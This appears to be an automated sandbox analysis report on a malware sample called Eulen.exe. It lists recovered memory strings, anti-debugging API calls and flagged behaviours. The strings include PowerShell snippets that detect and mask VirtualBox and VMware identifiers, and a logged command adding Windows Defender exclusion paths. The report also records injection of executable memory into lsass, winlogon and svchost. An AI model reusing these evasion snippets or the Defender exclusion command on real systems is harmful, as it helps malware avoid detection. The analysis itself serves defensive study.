Source: svchost.exe, 00000021.00000002.2688992019.0000024BD35D0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk2.06000c29198182f16b7176b0e680deba6PCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: svchost.exe, 00000021.00000000.1624072878.0000024BD5200000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: Eulen.exe, 00000000.00000002.1654102663.00007FF6DFA7D000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: fLZVmcIN^
Source: svchost.exe, 00000021.00000000.1636986057.0000024BD5D43000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: svchost.exe, 00000021.00000002.2723449932.0000024BD5BD1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 9-4vmci
Source: lsass.exe, 00000016.00000002.2686343397.00000213BCE13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538141905.00000213BCE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2681555387.0000015870613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1550913027.0000015870613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000000.1590898977.000002C9AFC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.2682751227.000002C9AFC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001C.00000000.1595565692.000002C06F02A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.2677459393.000002C06F02A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.2687175881.0000022382041000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001E.00000000.1600016674.0000022382041000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.2690358775.0000024BD362B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000021.00000002.2688992019.0000024BD35D0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pVMwareVirtual disk6000c29198182f16b7176b0e680deba6
Source: dwm.exe, 00000018.00000000.1556176246.0000026DACB82000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: svchost.exe, 00000021.00000003.1682572135.0000024BD36A1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMCI: Using capabilities (0x1c).
Source: lsass.exe, 00000016.00000000.1538314202.00000213BCE89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicshutdownNT SERVICE
Source: svchost.exe, 00000021.00000000.1624072878.0000024BD5200000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pVMwareVirtual disk6000c29198182f16b7176b0e680deba68
Source: svchost.exe, 00000021.00000000.1636986057.0000024BD5D43000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: svchost.exe, 00000021.00000003.1677650585.0000024BD5112000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: nonicNECVMWarVMware SATA CD00
Source: svchost.exe, 00000021.00000003.1677650585.0000024BD5112000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: LSI_SASVMware Virtual disk 6000c29198182f16b7176b0e680deba6
Source: powershell.exe, 0000000F.00000002.1566783925.0000015D8022A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: svchost.exe, 00000021.00000000.1624072878.0000024BD5200000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: svchost.exe, 00000021.00000000.1623531752.0000024BD5024000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmcir:m
Source: svchost.exe, 00000021.00000003.1677650585.0000024BD5112000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000021.00000000.1636986057.0000024BD5D43000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: svchost.exe, 00000017.00000002.2685559593.000001587065F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 0000001C.00000002.2675634761.000002C06F000000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: lsass.exe, 00000016.00000000.1538314202.00000213BCE89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicheartbeatNT SERVICE
Source: svchost.exe, 00000021.00000000.1623393586.0000024BD3FE2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: dowvmci
Source: svchost.exe, 00000021.00000003.1681695409.0000024BD5B03000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware
Source: svchost.exe, 00000021.00000000.1636986057.0000024BD5D43000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
Source: svchost.exe, 00000021.00000000.1636986057.0000024BD5D43000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
Source: dwm.exe, 00000018.00000000.1556176246.0000026DACB82000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000

Source: C:\Windows\System32\dialer.exe

API call chain: ExitProcess graph end node

graph_14-511

Source: C:\Users\user\Desktop\Eulen.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\winlogon.exe

Code function: 19_2_000002E991757E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

19_2_000002E991757E70

Source: C:\Windows\System32\dialer.exe

Code function: 14_2_00007FF6473417F8 GetProcessHeap,HeapAlloc,OpenProcess,TerminateProcess,CloseHandle,GetProcessHeap,HeapFree,

14_2_00007FF6473417F8

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Process token adjusted: Debug

Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E991757E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_000002E991757E70
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E991763218 SetUnhandledExceptionFilter,	19_2_000002E991763218
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E99175B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_000002E99175B50C
Source: C:\Windows\System32\lsass.exe	Code function: 22_2_00000213BDCEB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_00000213BDCEB50C
Source: C:\Windows\System32\lsass.exe	Code function: 22_2_00000213BDCE7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_00000213BDCE7E70
Source: C:\Windows\System32\lsass.exe	Code function: 22_2_00000213BDCF3218 SetUnhandledExceptionFilter,	22_2_00000213BDCF3218
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_00000158709D7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	23_2_00000158709D7E70
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_00000158709DB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	23_2_00000158709DB50C
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_00000158709E3218 SetUnhandledExceptionFilter,	23_2_00000158709E3218
Source: C:\Windows\System32\dwm.exe	Code function: 24_2_0000026DB15D3218 SetUnhandledExceptionFilter,	24_2_0000026DB15D3218
Source: C:\Windows\System32\dwm.exe	Code function: 24_2_0000026DB15C7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_0000026DB15C7E70
Source: C:\Windows\System32\dwm.exe	Code function: 24_2_0000026DB15CB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_0000026DB15CB50C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002A3F0667E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_000002A3F0667E70
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002A3F066B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_000002A3F066B50C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002A3F0673218 SetUnhandledExceptionFilter,	26_2_000002A3F0673218
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_000002C9AFBBB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_000002C9AFBBB50C
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_000002C9AFBB7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_000002C9AFBB7E70
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_000002C9AFBC3218 SetUnhandledExceptionFilter,	27_2_000002C9AFBC3218
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_000002C9B02A3218 SetUnhandledExceptionFilter,	27_2_000002C9B02A3218
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_000002C9B0297E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_000002C9B0297E70
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_000002C9B029B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_000002C9B029B50C
Source: C:\Windows\System32\svchost.exe	Code function: 28_2_000002C06FD47E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	28_2_000002C06FD47E70
Source: C:\Windows\System32\svchost.exe	Code function: 28_2_000002C06FD53218 SetUnhandledExceptionFilter,	28_2_000002C06FD53218
Source: C:\Windows\System32\svchost.exe	Code function: 28_2_000002C06FD4B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	28_2_000002C06FD4B50C
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002917C3BB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	29_2_000002917C3BB50C
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002917C3C3218 SetUnhandledExceptionFilter,	29_2_000002917C3C3218
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002917C3B7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	29_2_000002917C3B7E70
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002917C97B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	29_2_000002917C97B50C
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002917C983218 SetUnhandledExceptionFilter,	29_2_000002917C983218
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002917C977E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	29_2_000002917C977E70
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_000002238279B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	30_2_000002238279B50C
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_00000223827A3218 SetUnhandledExceptionFilter,	30_2_00000223827A3218
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_0000022382797E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	30_2_0000022382797E70
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_0000028A1B88B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	31_2_0000028A1B88B50C
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_0000028A1B887E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	31_2_0000028A1B887E70
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_0000028A1B893218 SetUnhandledExceptionFilter,	31_2_0000028A1B893218
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001486AD77E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	32_2_000001486AD77E70
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001486AD7B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	32_2_000001486AD7B50C
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001486AD83218 SetUnhandledExceptionFilter,	32_2_000001486AD83218
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001486ADD7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	32_2_000001486ADD7E70
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001486ADDB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	32_2_000001486ADDB50C
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001486ADE3218 SetUnhandledExceptionFilter,	32_2_000001486ADE3218
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_0000024BD3CD7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	33_2_0000024BD3CD7E70
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_0000024BD3CE3218 SetUnhandledExceptionFilter,	33_2_0000024BD3CE3218
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_0000024BD3CDB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	33_2_0000024BD3CDB50C
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_0000024BD3D37E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	33_2_0000024BD3D37E70
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_0000024BD3D43218 SetUnhandledExceptionFilter,	33_2_0000024BD3D43218
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_0000024BD3D3B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	33_2_0000024BD3D3B50C
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001FA73D67E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	34_2_000001FA73D67E70
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001FA73D73218 SetUnhandledExceptionFilter,	34_2_000001FA73D73218
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001FA73D6B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	34_2_000001FA73D6B50C
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E4303218 SetUnhandledExceptionFilter,	39_2_00000249E4303218
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E42F7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_00000249E42F7E70
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E42FB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_00000249E42FB50C
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E4333218 SetUnhandledExceptionFilter,	39_2_00000249E4333218
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E4327E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_00000249E4327E70
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Code function: 39_2_00000249E432B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_00000249E432B50C
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000001CD02407E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	41_2_000001CD02407E70
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000001CD0240B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	41_2_000001CD0240B50C
Source: C:\Windows\System32\svchost.exe	Code function: 41_2_000001CD02413218 SetUnhandledExceptionFilter,	41_2_000001CD02413218
Source: C:\Windows\System32\svchost.exe	Code function: 42_2_00000269BA66B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_00000269BA66B50C
Source: C:\Windows\System32\svchost.exe	Code function: 42_2_00000269BA673218 SetUnhandledExceptionFilter,	42_2_00000269BA673218
Source: C:\Windows\System32\svchost.exe	Code function: 42_2_00000269BA667E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_00000269BA667E70
Source: C:\Windows\System32\svchost.exe	Code function: 42_2_00000269BA6CB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_00000269BA6CB50C
Source: C:\Windows\System32\svchost.exe	Code function: 42_2_00000269BA6D3218 SetUnhandledExceptionFilter,	42_2_00000269BA6D3218
Source: C:\Windows\System32\svchost.exe	Code function: 42_2_00000269BA6C7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_00000269BA6C7E70

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Users\user\Desktop\Eulen.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force			Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\winlogon.exe base: 2E991720000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\lsass.exe base: 213BDCB0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 158709A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dwm.exe base: 26DB1590000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2A3EFFC0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2C9AFB80000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2C06F7B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2917C380000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 22382760000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 28A1B1D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1486AD40000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 24BD3CA0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1FA73D30000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1CD021B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 269B9FD0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 22054D80000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 27C57DA0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2A333B40000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe base: 249E3EE0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1F174530000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23315740000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2A9C8540000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1EC212A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1876D540000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 22CD8950000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 15104330000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 22308E70000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1AB19360000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1E731800000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1A6DD9B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1E2FA1C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\spoolsv.exe base: D50000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 209D2560000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1FC05190000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2AFD1A00000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D6B0C10000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2036E5A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 150FC6C0000 protect: page execute and read and write	Jump to behavior
